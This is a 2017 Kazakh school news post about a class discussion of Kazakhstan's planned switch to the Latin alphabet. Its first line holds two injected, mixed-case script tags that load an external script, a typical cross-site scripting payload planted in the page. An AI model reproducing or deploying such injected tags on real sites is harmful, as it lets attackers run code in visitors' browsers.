<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.10.2017

Латын әліпбиіне көшу – заман талабы

         Елбасы Н.Ә.Назарбаев өзінің «Болашаққа бағдар: рухани жаңғыру» атты мақаласында 2017 жылдың соңына дейін тіл білімінің ғалымдарымен бірлесіп бірыңғай жаңартылған қазақ әліпбиінің графикасын құруды

тапсырды. Осы тақырыпта 8-сынып оқушыларымен әңгіме жүргізілді.

«2025 жылға дейін латын әліпбиіне түгелдей көшу жоспарланған. Іс-қағаздар,

мерзімді баспа, оқулықтар латын әліпбиінде басылатын болады. Әрине, жаңа

әліпбиге көшу үшін уақыт қажет. Алайда латын таңбаларымен жазылған сөздерді біз

жиі кездестіреміз: ағылшын, француз, неміс тілдерінен енген сөздерді әрдайым күнделікті

тұрмыста және әлеуметтік желілерде қолданамыз, латын графикасына негізделген  ағылшын тілін үйренудеміз» - деп орыс тілі мұғалімі Г.У. Нұрбаева баяндады.

         Оқушылар статистика бойынша бүкіл

әлемде халықтардың 80%  латын графикасын

қолданатынын білді. Сол себепті заманауи технологияларды меңгеру үшін адамзат

баласы аталған графиканы үйренуге ұмтылғанын атап өтті.

Просмотров: 1086


Пікір қосу



Деректерді қолтаңбаға қосу